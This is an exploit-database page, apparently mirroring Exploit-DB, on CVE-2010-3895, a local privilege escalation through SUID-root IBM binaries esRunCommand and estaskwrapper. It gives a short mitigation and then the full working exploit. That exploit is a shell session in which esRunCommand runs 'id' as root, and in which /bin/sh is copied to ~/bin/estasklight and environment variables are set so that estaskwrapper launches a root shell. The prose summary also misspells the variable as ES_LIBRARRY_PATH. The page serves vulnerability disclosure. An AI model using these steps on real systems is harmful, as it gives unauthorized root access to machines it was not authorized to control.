header-logo
Suggest Exploit
vendor:
esRunCommand and estaskwrapper
by:
None
7,2
CVSS
HIGH
Privilege Escalation
264
CWE
Product Name: esRunCommand and estaskwrapper
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2010-3895
CPE: None
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2010

Privilege escalation in two applications (CVE-2010-3895)

Root SUID bits are set for the applications »esRunCommand« and »estaskwrapper«. esRunCommand takes one argument and runs it as root. The application »estaskwrapper« is meant to start the application »estasklight«. If the user has the environment variable »ES_LIBRARY_PATH« set, the value is copied to two new environment variables »LD_LIBRARY_PATH« and »LIBPATH«. If the »auth« flag is set, the application »estasklight« is executed. An exploit for running /bin/sh is to copy /bin/sh to ~/bin/estasklight, set the environment variable ES_LIBRARRY_PATH to ~/bin and run /opt/IBM/es/bin/estaskwrapper estasklight.

Mitigation:

Ensure that the SUID bits are not set for the applications esRunCommand and estaskwrapper.
Source

Exploit-DB raw data:

* Privilege escalation in two applications (CVE-2010-3895)

Root SUID bits are set for the applications »esRunCommand« and »estaskwrapper«.

-------------------------------------------------------------------------
  -rwsr-xr-x 1 root users ... /opt/IBM/es/bin/esRunCommand
  -rwsr-xr-x 1 root users ... /opt/IBM/es/bin/estaskwrapper
-------------------------------------------------------------------------


»esRunCommand« takes one argument and runs it as root. See example below.
-------------------------------------------------------------------------
  -rwsr-xr-x 1 root users ... /opt/IBM/es/bin/esRunCommand
  
  joemueller@XXX:/opt/IBM/es/bin> ./esRunCommand id
  OUTPUT: cmd is id
  id
  uid=0(root) gid=100(users) Gruppen=16(dialout),33(video),100(users)
-------------------------------------------------------------------------



The application »estaskwrapper« is meant to start the application »estasklight«. 
The pseudo c code looks like this:
-------------------------------------------------------------------------
	main() {
	  int auth = 0;
	  ...
	  if (argv[1] == "estasklight") {
	    auth = 1;
		  ...
		  path = getenv("ES_LIBRARY_PATH");
		  if (path) {
		    setenv("LD_LIBRARY_PATH", path);
		    setenv("LIBPATH", path);
		    ...
		    if (auth) {
		  	  execvp ("estasklight", args);
		    }
		    ...
		  }
	    ...
	  }
	...
	}
-------------------------------------------------------------------------


Explanation of the code:

»argv[1]« is the first command line argument, that is compared with the string
»estasklight«. If it is equal the »auth« flag is set. 
If the user has the environment variable »ES_LIBRARY_PATH« set, the value is
copied to two new environment variables »LD_LIBRARY_PATH« and »LIBPATH«.
If the »auth« flag is set, the application »estasklight« is executed.



Exploit for running /bin/sh
-------------------------------------------------------------------------
joemueller@XXX:~> cp /bin/sh ~/bin/estasklight
joemueller@XXX:~> export ES_LIBRARY_PATH=/home/joemueller
joemueller@XXX:~> export PATH=/home/joemueller/bin:$PATH
joemueller@XXX:~> /opt/IBM/es/bin/estaskwrapper estasklight
XXX:~# id
uid=0(root) gid=100(users) Gruppen=16(dialout),33(video),100(users)
-------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR